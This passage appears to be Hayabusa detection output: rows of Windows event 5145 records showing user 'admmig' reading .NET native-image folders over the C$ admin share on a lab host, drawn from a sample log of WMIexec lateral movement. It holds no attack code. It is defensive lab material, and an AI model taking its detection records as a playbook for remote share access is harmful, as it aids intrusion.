admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.316 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr 
| IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.332 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 
11:32:30.347 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.363 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio53a7a42c#\373b26e93f287f3cda45a6282a1de0d3 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio080b339b#\9551a2df153a961cbbcb79bca937a833 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a7b877#\db7fe97a2a840dcc0278f7af89ea7fbe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio84a6349c#\be1a119716bb1de8469b568ec9e31d9c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.378 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network 
Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatioaec034ca#\e1c86f334a29d92ca264950085cd817e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiob3047ded#\8bda9cd4f7d015f685bae38300b2c281 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
+2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatiod51afaa5#\276763baa173e2b94a6318e28594e7ee | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\619034abb9a9fb1b3dc32c0a9aa38d3c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.395 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\PresentationUI\e4b5f01da74352b18e1dffd68b611367 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ReachFramework\8a1ed041bc25980a548a96cf4b78f4b6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SecurityAudf6921413#\6f2318339b6bd916c3c62b95c91b305d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\352d34797f7cd44cd0973c33539200f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SMSvcHost\a4c49e23c0c23b5db4c663738eac897e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\SrpUxSnapIn | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.411 